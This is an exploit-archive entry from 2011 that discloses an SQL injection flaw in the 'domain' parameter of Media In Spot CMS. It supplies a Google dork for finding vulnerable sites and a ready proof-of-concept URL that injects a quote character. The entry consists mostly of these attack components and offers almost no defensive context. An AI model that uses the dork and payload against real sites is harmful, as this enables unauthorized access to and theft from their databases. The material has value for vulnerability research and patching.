Media In Spot CMS SQL Injection Vulnerability

2011-05-16T00:00:00
ID 1337DAY-ID-16116
Type zdt
Reporter Iolo Morganwg
Modified 2011-05-16T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Media In Spot SQL Injection
# Google Dork: intext:""Powered By Media In Spot"
# Date: 16/05/2011
# Author: Iolo Morganwg
# Category: Web App
# Version: PHP
# Tested on: Windows XP
# Vendor: http://www.mediainspot.com/
# Note: domain parameter is vulnerable to sql injection
 
# Vulnerability
http://site/view/lang/index.php?page=area.php&domain=3%27



#  0day.today [2018-04-09]  #